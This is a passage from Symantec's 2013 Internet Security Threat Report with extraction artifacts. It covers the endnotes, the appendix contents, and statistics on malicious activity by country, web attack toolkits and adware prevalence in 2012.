smartphones and tablets. We’ll see ransomware and drive-by<br />
website infections on these new platforms in the coming year.<br />
For businesses that use these new devices or allow employees<br />
to bring their own to work, this will present a serious <strong>security</strong><br />
problem in <strong>2013</strong>.<br />
Persistent Phishing<br />
Identities are valuable, so criminals will continue to try to steal<br />
them. Phishing attacks will continue to get smarter and more<br />
sophisticated. For example, we’ll see more perfect site replicas<br />
and SSL-encryption phishing sites. Phishing will become more<br />
regional and it will appear in a wider variety of languages,<br />
making it harder to block and more effective. It will continue<br />
its spread on social media websites where it will exploit the<br />
medium’s virality and trusted messaging.
p. 56<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
Endnotes<br />
01 See http://www.defense.gov/transcripts/transcript.aspx?transcriptid=5136.<br />
02 See http://krebson<strong>security</strong>.com/2012/03/mastercard-visa-warn-of-processor-breach/.<br />
03 See http://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf.f<br />
04 Aviation Week & Space Technology, October 22, 2012, 82.<br />
05 See http://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf.<br />
06 The data for the data breaches that could lead to identity theft is procured from the Norton Cybercrime Index (CCI). The Norton CCI<br />
is a statistical model that measures the levels of threats including malicious software, fraud, identity theft, spam, phishing, and<br />
social engineering daily. Data for the CCI is primarily derived from Symantec Global Intelligence Network and for certain data from<br />
ID Analytics. The majority of the Norton CCI’s data comes from Symantec’s Global Intelligence Network, one of the industry’s most<br />
comprehensive sources of intelligence about online threats. The data breach section of the Norton CCI is derived from data breaches<br />
that have been reported by legitimate media sources and have exposed personal information, including name, address, Social<br />
Security numbers, credit card numbers, or medical history. Using publicly available data the Norton CCI determines the sectors that<br />
were most often affected by data breaches, as well as the most common causes of data loss.<br />
07 See http://www.symantec.com/content/en/us/about/media/pdfs/b-ponemon-2011-cost-of-data-breach-global.en-us.pdf.<br />
08 See http://www.symantec.com/connect/blogs/shamoon-attacks.<br />
09 Internet Security Threat Report, April 2012, “Targeted Attacks,” 16.<br />
10 See http://www.symantec.com/content/en/us/enterprise/media/<strong>security</strong>_response/whitepapers/the-elderwood-project.pdf.<br />
11 See http://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid.<br />
12 See http://www.symantec.com/content/en/us/enterprise/media/<strong>security</strong>_response/whitepapers/the-elderwood-project.pdf.<br />
13 See http://www.symantec.com/connect/blogs/cost-cybercrime-2012.<br />
14 See http://www.symantec.com/connect/blogs/lizamoon-mass-sql-injection-tried-and-tested-formula.<br />
15 See http://www.symantec.com/connect/blogs/danger-malware-ahead-please-not-my-site.<br />
16 See http://www.<strong>security</strong>week.com/comodo-certificates-used-sign-banking-trojans-brazil.<br />
17 See http://blog.nielsen.com/nielsenwire/social/2012/.<br />
18 See http://www.symantec.com/connect/blogs/instaspam-instagram-users-receive-gift-card-spam.<br />
19 See http://www.gartner.com/it/page.jsp?id=2237315.<br />
20 See http://en.wikipedia.org/wiki/FinFisher and http://www.nytimes.com/2012/08/31/technology/finspy-software-is-trackingpolitical-dissidents.html?_r=1.<br />
21 See http://www.symantec.com/connect/blogs/androidbmaster-million-dollar-mobile-botnet.<br />
22 See http://www.symantec.com/connect/blogs/androidbmaster-million-dollar-mobile-botnet.<br />
23 See http://news.cnet.com/8301-1009_3-57470729-83/malware-went-undiscovered-for-weeks-on-google-play.<br />
24 See http://developer.android.com/about/dashboards/index.html.<br />
25 See http://www.gartner.com/it/page.jsp?id=2163616.<br />
26 See http://www.wired.com/threatlevel/2011/06/dropbox/.<br />
27 For more advice about cloud adoption, see https://www4.symantec.com/mktginfo/.<br />
28 In the United States, for example, the NTSB reports that 472 people died in aircraft accidents in 2010 compared with 32,885 in<br />
highway accidents. See http://www.ntsb.gov/data/index.html.<br />
29 See http://www.symantec.com/about/news/release/article.jsp?prid=20120905_02.<br />
30 See http://www.npr.org/blogs/money/<strong>2013</strong>/01/15/169424047/episode-430-black-market-pharmacies-and-the-spam-empire-behindthem.<br />
31 See http://www.symantec.com/<strong>security</strong>_response/writeup.jsp?docid=2012-041001-0020-99.<br />
32 See http://www.symantec.com/connect/blogs/flashback-cleanup-still-underway-approximately-140000-infections.<br />
33 See http://www.symantec.com/connect/blogs/both-mac-and-windows-are-targeted-once.<br />
34 See http://krebson<strong>security</strong>.com/tag/planet-money/.
<strong>internet</strong> <strong>security</strong> <strong>tHreAt</strong> <strong>rePOrt</strong><br />
APPenDiX <strong>2013</strong><br />
2012 Trends, Volume 18, Published April <strong>2013</strong>
p. 58<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
CONTENTS<br />
61 Appendix :: A<br />
Threat Activity Trends<br />
63 Malicious Activity by Source<br />
64 Malicious Activity by Source: Overall Rankings, 2011–2012<br />
65 Malicious Activity by Source: Malicious Code, 2011–2012<br />
65 Malicious Activity by Source: Spam Zombies, 2011–2012<br />
66 Malicious Activity by Source: Phishing Hosts, 2011–2012<br />
66 Malicious Activity by Source: Bots, 2011–2012<br />
67 Malicious Activity by Source: Web Attack Origins, 2011–2012<br />
67 Malicious Activity by Source: Network Attack Origins, 2011–2012<br />
69 Malicious Web-based Attack Prevalence<br />
69 Malicious Website Activity, 2011–2012<br />
71 Analysis of Malicious Web Activity<br />
by Attack Toolkits<br />
71 Malicious Website Activity: Attack Toolkit Trends, 2012<br />
72 Malicious Website Activity:<br />
Overall Frequency of Major Attack Toolkits, 2012<br />
73 Analysis of Web-based Spyware, Adware,<br />
and Potentially Unwanted Programs<br />
73 Potentially Unwanted Programs:<br />
Spyware and Adware Blocked, 2012<br />
75 Analysis of Web Policy Risks<br />
from Inappropriate Use<br />
75 Web Policies that Triggered Blocks, 2011–2012<br />
77 Analysis of Website Categories Exploited<br />
to Deliver Malicious Code<br />
77 Malicious Web Activity:<br />
Categories that Delivered Malicious Code, 2012<br />
78 Malicious Web Activity:<br />
Malicious Code by Number of Infections Per Site, 2012<br />
78 Malicious Web Activity: Fake Antivirus by Category, 2012<br />
79 Malicious Web Activity: Browser Exploits by Category, 2012<br />
79 Malicious Web Activity:<br />
Social Networking Attacks by Category, 2012<br />
81 Bot-infected Computers<br />
82 Table of Top 10 Bot Locations by Average Lifespan of Bot,<br />
2011–2012<br />
83 Analysis of Mobile Threats<br />
83 Android Mobile Threats: Newly Discovered Malicious Code,<br />
2011–2012<br />
84 Android Mobile Threats: Cumulative Number of Malware Families,<br />
2010–2012<br />
85 Mobile Threats: Malicious Code by Type, 2012<br />
85 Mobile Threats: Malicious Code by Type – Additional Detail, 2012<br />
86 Documented Mobile Vulnerabilities, 2012<br />
89 Data Breaches that Could Lead to Identity Theft<br />
90 Timeline of Data Breaches<br />
Showing Identities Breached in 2012, Global<br />
90 Data Breaches that Could Lead to Identity Theft<br />
(Top 10 Sectors by Number of Data Breaches)<br />
91 Data Breaches that Could Lead to Identity Theft<br />
(Top 10 Sectors by Number of Identities Exposed)<br />
91 Average Number of Identities Exposed Per Data Breach<br />
by Notable Sector<br />
92 Data Breaches that Could Lead to Identity Theft<br />
by Number of Breaches<br />
92 Data Breaches that Could Lead to Identity Theft<br />
by Number of Identitites Exposed<br />
93 Average Number of Identities Exposed Per Data Breach by Cause<br />
93 Type of Information Exposed in Deliberate Breaches<br />
94 Threat Activity Trends Endnotes
p. 59<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
95 Appendix :: B<br />
Malicious Code Trends<br />
97 Top Malicious Code Families<br />
98 Overall Top Malicious Code Families, 2012<br />
99 Relative Volume of Reports of Top 10 Malicious Code Families<br />
in 2012 by Percentage<br />
99 Relative Proportion of Top 10 Malicious Code Blocked in Email<br />
Traffic by Symantec.cloud in 2012 by Percentage and Ratio<br />
100 Trend of Malicious Code Blocked in Email Traffic by Symantec.cloud<br />
– 2011 vs 2012<br />
100 Relative Proportion of Top 10 Malicious Code Blocked in Web<br />
Traffic by Symantec.cloud in 2012 by Percentage and Ratio<br />
102 Analysis of Malicious Code Activity by Geography,<br />
Industry Sector, and Company Size<br />
102 Proportion of Email Traffic Identified as Malicious,<br />
by Industry Sector, 2012<br />
103 Proportion of Email Traffic Identified as Malicious<br />
by Organization Size, 2012<br />
103 Proportion of Email Traffic Identified as Malicious<br />
by Geographic Location, 2012<br />
105 Propagation Mechanisms<br />
106 Propagation Mechanisms<br />
108 Industrial Espionage: Targeted Attacks<br />
and Advanced Persistent Threats (APTs)<br />
109 Average Number of Targeted Email Attacks Per Day, 2012<br />
111 Targeted Attacks by Company Size, 2012<br />
111 Targeted Attacks Against Job Function, 2012<br />
112 Breakdown of Document Types Being Attached<br />
to Targeted Attacks, 2012<br />
113 Analysis of Targeted Attacks by Top 10 Industry Sectors, 2012<br />
114 Malicious Code Trends Endnotes<br />
115 Appendix :: C<br />
Spam and Fraud Activity Trends<br />
117 Analysis of Spam Activity Trends<br />
117 Global Spam Volume in Circulation, 2012<br />
118 Proportion of Email Traffic Identified as Spam, 2011–2012<br />
119 Analysis of Spam Activity by Geography,<br />
Industry Sector, and Company Size<br />
119 Proportion of Email Traffic Identified as Spam<br />
by Industry Sector, 2012<br />
120 Proportion of Email Traffic Identified as Spam<br />
by Organization Size, 2012<br />
120 Proportion of Email Traffic Identified as Spam<br />
by Geographic Location, 2012<br />
122 Analysis of Spam Delivered by Botnets<br />
122 Percentage of Spam Sent from Botnets in 2012<br />
123 Analysis of Spam-sending Botnet Activity, 2012<br />
124 Significant Spam Tactics<br />
124 Frequency of Spam Messages by Size, 2012<br />
125 Proportion of Spam Messages Containing URLs, 2012<br />
125 Analysis of Top-level Domains Used in Spam URLs, 2012<br />
126 Spam by Category<br />
127 Spam by Category, 2012<br />
128 Spam by Category, 2012<br />
129 Phishing Activity Trends<br />
129 Phishing Rates, 2011–2012<br />
130 Phishing Category Types, Top 200 Organizations, 2012<br />
130 Tactics of Phishing Distribution, 2012<br />
132 Analysis of Phishing Activity by Geography,<br />
Industry Sector, and Company Size<br />
132 Proportion of Email Traffic Identified as Phishing<br />
by Industry Sector, 2012
p. 60<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
133 Proportion of Email Traffic Identified as Phishing<br />
by Organization Size, 2012<br />
133 Proportion of Email Traffic Identified as Phishing<br />
by Geographic Location, 2012<br />
135 Spam and Fraud Activity Endnotes<br />
136 Appendix :: D<br />
Vulnerability Trends<br />
138 Total Number of Vulnerabilities<br />
139 Total Vulnerabilities Identified, 2006–2012<br />
139 New Vulnerabilities Month by Month, 2011 and 2012<br />
140 Most Frequently Attacked Vulnerabilities in 2012<br />
142 Zero-day Vulnerabilities<br />
142 Volume of Zero-day Vulnerabilities, 2006–2012<br />
143 Zero-day Vulnerabilities Identified in 2012<br />
144 Web Browser Vulnerabilities<br />
144 Browser Vulnerabilities, 2011 and 2012<br />
146 Web Browser Plug-in Vulnerabilities<br />
147 Browser Plug-in Vulnerabilities in 2011 and 2012<br />
148 Web Attack Toolkits<br />
149 SCADA Vulnerabilities<br />
150 Vulnerability Trends Endnotes<br />
151 Appendix :: E<br />
Government Threat Activity Trends<br />
153 Malicious Activity<br />
by Critical Infrastructure Sector<br />
153 Malicious Activity by Critical Infrastructure Sector<br />
154 Sources of Origin<br />
for Government-targeted Attacks<br />
154 Sources of Origin for Government-targeted Attacks<br />
156 Attacks by Type –<br />
Overall Government and Critical Infrastructure Organizations<br />
157 Attacks by Type –<br />
Notable Critical Infrastructure Sectors<br />
158 Government Threat Activity Endnotes<br />
159 About Symantec<br />
159 More Information
p. 61<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
APPENDIX :: A<br />
ThREAT ACTIVITy<br />
TRENDS
p. 62<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Threat Activity Trends<br />
The Symantec Global Internet Security Threat Report provides an analysis of threat activity,<br />
as well as other malicious activity, data breaches, and Web-based attacks that Symantec<br />
observed in 2012. The malicious activity discussed in this section not only includes threat<br />
activity, but also phishing, malicious code, spam zombies, bot-infected computers, and<br />
attack origins.<br />
Attacks are defined as any malicious activity carried out over a network that has been<br />
detected by an intrusion detection system (IDS) or firewall. Definitions for the other<br />
types of malicious activities can be found in their respective sections within this report.<br />
This section covers the following metrics and provides analysis and discussion of the trends indicated by the data:<br />
• Malicious Activity by Source<br />
• Malicious Web-based Attack Prevalence<br />
• Analysis of Malicious Web Activity by Attack Toolkits<br />
• Analysis of Web-based Spyware, Adware, and Potentially Unwanted Programs<br />
• Analysis of Web Policy Risks from Inappropriate Use<br />
• Analysis of Website Categories Exploited to Deliver Malicious Code<br />
• Bot-infected Computers<br />
• Analysis of Mobile Threats<br />
• Data Breaches that Could Lead to Identity Theft
p. 63<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Malicious Activity by Source<br />
Background<br />
Malicious activity usually affects computers that are connected<br />
to high-speed broadband Internet because these connections are<br />
attractive targets for attackers. Broadband connections provide<br />
larger bandwidth capacities than other connection types,<br />
faster speeds, the potential of constantly connected systems,<br />
and a typically more stable connection. Symantec categorizes<br />
malicious activities as follows:<br />
Malicious code: This includes programs such as viruses,<br />
worms, and Trojans that are covertly inserted into programs.<br />
The purposes of malicious code include destroying data,<br />
running destructive or intrusive programs, stealing sensitive<br />
information, or compromising the <strong>security</strong> or integrity of a<br />
victim’s computer data.<br />
Spam zombies: These are remotely controlled, compromised<br />
systems specifically designed to send out large volumes of<br />
junk or unsolicited email messages. These email messages<br />
can be used to deliver malicious code and phishing attempts.<br />
Phishing hosts: A phishing host is a computer that provides<br />
website services in order to illegally gather sensitive user<br />
information while pretending that the attempt is from a<br />
trusted, well-known organization by presenting a website<br />
designed to mimic the site of a legitimate business.<br />
Bot-infected computers: Malicious programs have been<br />
used to compromise these computers to allow an attacker<br />
to control the targeted system remotely. Typically, a remote<br />
attacker controls a large number of compromised computers<br />
over a single, reliable channel in a botnet, which can then be<br />
used to launch coordinated attacks.<br />
Network attack origins: This measures the originating<br />
sources of attacks from the Internet. For example, attacks<br />
can target SQL protocols or buffer overflow vulnerabilities.<br />
Web-based attack origins: This measures attack sources<br />
that are delivered via the Web or through HTTP. Typically,<br />
legitimate websites are compromised and used to attack<br />
unsuspecting visitors.<br />
Methodology<br />
This metric assesses the sources from which the largest amount<br />
of malicious activity originates. To determine malicious activity<br />
by source, Symantec has compiled geographical data on<br />
numerous malicious activities, namely: malicious code reports,<br />
spam zombies, phishing hosts, bot-infected computers, network<br />
attack origins, and Web-based attack origins. The proportion<br />
of each activity originating in each source is then determined.<br />
The mean of the percentages of each malicious activity that<br />
originates in each source is calculated. This average determines<br />
the proportion of overall malicious activity that originates<br />
from the source in question and the rankings are determined<br />
by calculating the mean average of the proportion of these<br />
malicious activities that originated in each source.
p. 64<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Data<br />
Figure A.1. Malicious Activity by Source: Overall Rankings, 2011–2012<br />
Source: Symantec<br />
Geography<br />
1<br />
4<br />
2012<br />
World Rank<br />
2012<br />
Overall<br />
Average<br />
8 6 5<br />
7<br />
10<br />
2011<br />
World Rank<br />
3<br />
2<br />
9<br />
2011<br />
Overall<br />
Average<br />
Change<br />
united states 1 22.7% 1 21.1% 1.6%<br />
china 2 11.0% 2 9.2% 1.8%<br />
india 3 6.5% 3 6.2% 0.3%<br />
Brazil 4 4.0% 4 4.1% -0.1%<br />
Germany 5 3.4% 5 3.9% -0.5%<br />
netherlands 6 2.7% 20 1.1% 1.6%<br />
italy 7 2.4% 9 2.7% -0.3%<br />
united Kingdom 8 2.4% 7 3.2% -0.8%<br />
taiwan 9 2.3% 8 3.0% -0.7%<br />
russia 10 2.2% 6 3.2% -1.0%
p. 65<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.2. Malicious Activity by Source: Malicious Code, 2011–2012<br />
Source: Symantec<br />
Geography<br />
Figure A.3. Malicious Activity by Source: Spam Zombies, 2011–2012<br />
Source: Symantec<br />
Geography<br />
2012<br />
Malicious<br />
Code Rank<br />
2012<br />
Spam<br />
Zombies Rank<br />
2012<br />
Malicious<br />
Code %<br />
2012<br />
Spam<br />
Zombies %<br />
2011<br />
Malicious<br />
Code Rank<br />
2011<br />
Spam<br />
Zombies Rank<br />
2011<br />
Malicious<br />
Code %<br />
2011<br />
Spam<br />
Zombies %<br />
Change<br />
united states 1 17.2% 2 13.3% 3.9%<br />
india 2 16.2% 1 15.3% 0.9%<br />
china 3 6.1% 4 5.1% 0.9%<br />
indonesia 4 3.9% 3 8.0% -4.1%<br />
Japan 5 3.4% 11 2.2% 1.2%<br />
Vietnam 6 3.0% 6 3.8% -0.8%<br />
Brazil 7 2.9% 8 2.8% 0.0%<br />
united Kingdom 8 2.7% 5 4.0% -1.3%<br />
egypt 9 2.6% 7 3.4% -0.8%<br />
Germany 10 2.5% 15 1.5% 1.0%<br />
Change<br />
india 1 17.1% 1 17.5% -0.3%<br />
saudi Arabia 2 7.0% 19 1.5% 5.6%<br />
netherlands 3 6.5% 27 0.7% 5.8%<br />
Brazil 4 5.5% 5 6.0% -0.5%<br />
united states 5 4.2% 15 1.8% 2.4%<br />
spain 6 4.0% 21 1.4% 2.6%<br />
Argentina 7 3.8% 12 2.2% 1.6%<br />
Germany 8 3.6% 23 1.2% 2.4%<br />
china 9 3.1% 9 2.6% 0.5%<br />
russia 10 2.7% 3 7.8% -5.0%
p. 66<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.4. Malicious Activity by Source: Phishing hosts, 2011–2012<br />
Source: Symantec<br />
Geography<br />
Figure A.5. Malicious Activity by Source: Bots, 2011–2012<br />
Source: Symantec<br />
Geography<br />
2012<br />
Phishing<br />
Hosts Rank<br />
2012<br />
Bots Rank<br />
2012<br />
Phishing<br />
Hosts %<br />
2012<br />
Bots %<br />
2011<br />
Phishing<br />
Hosts Rank<br />
2011<br />
Bots Rank<br />
2011<br />
Phishing<br />
Hosts %<br />
2011<br />
Bots %<br />
Change<br />
united states 1 50.0% 1 48.5% 1.4%<br />
Germany 2 6.2% 2 6.8% -0.6%<br />
united Kingdom 3 3.9% 3 3.6% 0.2%<br />
Brazil 4 3.6% 8 2.3% 1.3%<br />
china 5 3.2% 5 3.1% 0.2%<br />
canada 6 2.9% 4 3.3% -0.4%<br />
France 7 2.7% 7 2.4% 0.3%<br />
russia 8 2.4% 9 2.3% 0.0%<br />
netherlands 9 2.3% 6 2.4% -0.1%<br />
Poland 10 1.6% 12 1.6% -0.1%<br />
Change<br />
united states 1 15.3% 1 12.6% 2.8%<br />
china 2 15.0% 6 6.6% 8.4%<br />
taiwan 3 7.9% 2 11.4% -3.5%<br />
Brazil 4 7.8% 3 8.9% -1.1%<br />
italy 5 7.6% 4 8.3% -0.7%<br />
Japan 6 4.6% 8 4.6% 0.0%<br />
Poland 7 4.4% 7 5.4% -1.0%<br />
Hungary 8 4.2% 9 4.3% -0.1%<br />
Germany 9 4.0% 5 7.0% -2.9%<br />
spain 10 3.2% 11 2.6% 0.6%
p. 67<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.6. Malicious Activity by Source: Web Attack Origins, 2011–2012<br />
Source: Symantec<br />
Geography<br />
Figure A.7. Malicious Activity by Source: Network Attack Origins, 2011–2012<br />
Source: Symantec<br />
Geography<br />
2012 Web<br />
Attacking<br />
Countries<br />
Rank<br />
2012<br />
Network<br />
Attacking<br />
Countries<br />
Rank<br />
2012 Web<br />
Attacking<br />
Countries %<br />
2012<br />
Network<br />
Attacking<br />
Countries %<br />
2011 Web<br />
Attacking<br />
Countries<br />
Rank<br />
2011<br />
Network<br />
Attacking<br />
Countries<br />
Rank<br />
2011 Web<br />
Attacking<br />
Countries %<br />
2011<br />
Network<br />
Attacking<br />
Countries %<br />
Change<br />
united states 1 34.4% 1 33.5% 0.9%<br />
china 2 9.4% 2 11.0% -1.6%<br />
Korea, south 3 3.0% 3 4.4% -1.4%<br />
Germany 4 2.6% 4 3.5% -0.9%<br />
netherlands 5 2.4% 8 2.0% 0.5%<br />
india 6 1.7% 14 1.0% 0.6%<br />
Japan 7 1.6% 6 2.2% -0.6%<br />
russia 8 1.5% 7 2.1% -0.6%<br />
united Kingdom 9 1.5% 5 2.3% -0.8%<br />
Brazil 10 1.3% 11 1.3% 0.0%<br />
Change<br />
china 1 29.2% 1 26.9% 2.3%<br />
united states 2 14.9% 2 16.9% -1.9%<br />
russia 3 3.7% 5 3.4% 0.3%<br />
united Kingdom 4 3.1% 3 4.1% -0.9%<br />
Brazil 5 3.0% 6 3.2% -0.2%<br />
netherlands 6 2.6% 21 0.8% 1.8%<br />
Japan 7 2.4% 8 2.5% 0.0%<br />
india 8 2.4% 11 2.0% 0.4%<br />
italy 9 2.4% 7 2.8% -0.4%<br />
France 10 2.3% 10 2.1% 0.2%
p. 68<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Commentary<br />
• In 2012, corresponding with their large Internet<br />
populations, the United States and China remained the<br />
top two sources overall for malicious activity: The overall<br />
average proportion of attacks originating from the United<br />
States in 2012 increased by 1.6 percentage points compared<br />
with 2011, while the same figure for China saw an increase<br />
by 1.8 percentage points compared with 2011. Malicious<br />
activity in the Netherlands also increased by 1.6 percentage<br />
points, resulting in the country being ranked in sixth<br />
position, compared with twentieth in 2011.<br />
• 29.2 percent of network attacks originated in China: China<br />
has the largest population of Internet users 1 in the Asia<br />
region, with its Internet population growing to 564 million<br />
in 2012.<br />
• 50.0 percent of phishing websites were hosted in the<br />
United States: In 2012, with approximately 275 million<br />
Internet users, the United States has the second largest<br />
population of Internet users in the world.<br />
• The United States was ranked in first position for the<br />
source of all activities except for spam zombies and network<br />
attacks, for which India was ranked in first position for<br />
spam zombies and China the latter.<br />
• 15.3 percent of bot activity originated in the United States:<br />
The United States was the main source of bot-infected<br />
computers, an increase of 2.8 percentage points compared<br />
with 2011.<br />
• 34.4 percent of Web-based attacks originated in the United<br />
States: Web-based attacks originating from the United<br />
States increased by 0.9 percentage points in 2012.<br />
• 17.1 percent of spam zombies were located in India, a<br />
decrease of 0.3 percentage points compared with 2011:<br />
The proportion of spam zombies located in the United<br />
States rose by 2.4 percentage points to 4.2 percent, resulting<br />
in the United States being ranked in fifth position in 2012,<br />
compared with fifteenth position in 2011.<br />
• 17.2 percent of all malicious code activities originated<br />
from the United States, an increase of 3.9 percentage<br />
points compared with 2011, overtaking India as the<br />
main source of malicious code activity in 2012: With<br />
16.2 percent of malicious activity originating in India,<br />
the country was ranked in second position. India has<br />
approximately 150 million Internet users, which is the<br />
third largest population of Internet users in the world.
p. 69<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Malicious Web-based Attack Prevalence<br />
Background<br />
The circumstances and implications of Web-based attacks vary<br />
widely. They may target specific businesses or organizations,<br />
or they may be widespread attacks of opportunity that exploit<br />
current events, zero-day vulnerabilities, or recently patched and<br />
publicized vulnerabilities that many users have yet to protect<br />
themselves against. While major attacks may have individual<br />
importance and often receive significant attention when they<br />
occur, examining overall Web-based attacks provides insight<br />
into the threat landscape and how attack patterns may be<br />
shifting. Analysis of the underlying trend can provide insight<br />
into potential shifts in Web-based attack usage and can assist<br />
in determining if attackers are more or less likely to employ<br />
Web-based attacks in the future. To see which vulnerabilities<br />
are being exploited by Web-based attacks, see Appendix D:<br />
Vulnerability Trends.<br />
Data<br />
Figure A.8. Malicious Website Activity, 2011–2012<br />
Source: Symantec<br />
THOUSANDS<br />
400<br />
350<br />
300<br />
250<br />
200<br />
150<br />
100<br />
50<br />
0<br />
JUL<br />
AUG<br />
SEP<br />
OCT<br />
NOV<br />
DEC<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
Methodology<br />
This metric assesses changes to the prevalence of Web-based<br />
attack activity by comparing the overall volume of activity and<br />
the average number of attacks per day in each month during the<br />
current and previous reporting periods.<br />
JUL<br />
AUG<br />
SEP<br />
OCT<br />
NOV<br />
DEC<br />
2011 2012
p. 70<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Commentary<br />
• The average number of malicious websites blocked each<br />
day rose by approximately 30 percent for all of 2012 to an<br />
average of 247,350, compared with 190,370 in the second<br />
half of 2011. A rise in attacks at the beginning of the year<br />
contributed in large part to this increase.<br />
• The average number of websites blocked each day in the<br />
first half of 2012 compared with the second half of 2011,<br />
rose by 48 percent to an average of 281,283.<br />
• The average number of websites blocked each day in the<br />
second half of 2012 compared with the second half of 2011<br />
rose by 12 percent to an average of 213,417.<br />
• The peak rate of malicious activity was 339,078 blocks per<br />
day in March 2012, when the number of malicious blocks<br />
was 37 percent higher than the annual average.<br />
• The lowest rate of malicious activity was 125,384 blocks<br />
per day in December 2012, when the number of malicious<br />
blocks was 49 percent lower than the annual average.<br />
• Further analysis of malicious code activity may be found in<br />
Appendix B: Malicious Code Trends: Overall Top Malicious<br />
Code Families, 2012.
p. 71<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Analysis of Malicious Web Activity by Attack Toolkits<br />
Background<br />
The increasing pervasiveness of Web browser applications,<br />
along with increasingly common, easily exploited Web browser<br />
application <strong>security</strong> vulnerabilities, has resulted in the<br />
widespread growth of Web-based threats. Attackers wanting to<br />
take advantage of client-side vulnerabilities no longer need to<br />
actively compromise specific networks to gain access to those<br />
computers. These attacks work by infecting enterprise and<br />
consumers that visit mainstream websites hosting Web-attack<br />
toolkits, and silently infect them with a variety of malware.<br />
Symantec analyzes attack activity to determine which types<br />
of attacks and attack toolkits attackers are utilizing. This can<br />
provide insight into emerging Web attack trends and may<br />
indicate the types of attacks with which attackers are having<br />
the most success.<br />
Data<br />
Figure A.9. Malicious Website Activity: Attack Toolkit Trends, 2012<br />
Source: Symantec<br />
90%<br />
80<br />
70<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
JUL<br />
AUG<br />
Methodology<br />
This metric assesses the top Web-based attack activity grouped<br />
by exploit “Web kit” families. These attacks originated from<br />
compromised legitimate sites and intentionally malicious sites<br />
set up to target Web users in 2012. To determine this, Symantec<br />
ranked attack activity by the number of associated incidents<br />
associated with each given Web kit.<br />
SEP<br />
OCT<br />
NOV<br />
DEC<br />
Others<br />
Blackhole<br />
Sakura<br />
Nuclear<br />
Redkit<br />
Phoenix
p. 72<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.10. Malicious Website Activity: Overall Frequency of Major Attack Toolkits, 2012<br />
Source: Symantec<br />
45%<br />
40<br />
35<br />
30<br />
25<br />
20<br />
15<br />
10<br />
5<br />
0<br />
41<br />
BLACKHOLE<br />
Commentary<br />
22<br />
SAKURA<br />
10<br />
PHOENIX<br />
7<br />
REDKIT<br />
• Blackhole continues to be the most dominant Web attack kit<br />
in 2012, accounting for 40.7 percent of attacks blocked from<br />
Web attack toolkits, compared with 44.3 percent in 2011.<br />
The Sakura toolkit was ranked second, accounting for 22<br />
percent of attacks blocked and was not ranked in the top<br />
10 in 2011.<br />
• The Sakura Web attack kit was updated to version 1.1 in<br />
early 2012. And many of the more common attack toolkits<br />
were updated in 2012 to include exploits for the Java<br />
Runtime Environment, including CVE-2012-0507, CVE-<br />
2012-1723, and CVE-2012-4681.<br />
• The Blackhole kit was updated frequently and the code is<br />
highly obfuscated. It is often used to deploy ransomware<br />
and fake <strong>security</strong> software.<br />
3<br />
NUCLEAR<br />
17<br />
OTHERS
p. 73<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Analysis of Web-based Spyware, Adware, and Potentially Unwanted Programs<br />
Background<br />
One of the main goals of a drive-by Web-based installation is the<br />
deployment of malicious code, but often a compromised website<br />
is also used to install spyware or adware code. This is because<br />
the cybercriminals pushing the spyware and adware in this way<br />
are being paid a small fee for each installation. However, most<br />
adware vendors, such as those providing add-in toolbars for<br />
Web browsers, are not always aware how their code came to be<br />
installed on the users’ computers. The expectation is that it is<br />
with the permission of the end user, when this is typically not<br />
the case in a drive-by installation and may be in breach of the<br />
vendors’ terms and conditions of use.<br />
Data<br />
Figure A.11. Potentially Unwanted Programs: Spyware and Adware Blocked, 2012<br />
Source: Symantec.cloud<br />
Rank Top 10 Potentially Unwanted Programs %<br />
Methodology<br />
1 Application.DirectDownloader.A 94.2%<br />
2 spyware.PcAcme 1.5%<br />
3 Adware.Js.script.c 0.2%<br />
4 Application:Android/counterclank.A 0.2%<br />
5 Application.installcore.e 0.2%<br />
6 Adware:W32/cDn.A 0.2%<br />
7 Adware.solimba.c 0.2%<br />
8 spyware.Ardakey 0.2%<br />
9 Adware:Android/AirPush.A 0.2%<br />
10 spyware.Keylogger 0.1%<br />
This metric assesses the prevalence of Web-based spyware and<br />
adware activity by tracking the trend in the average number of<br />
spyware and adware related websites blocked each day by users<br />
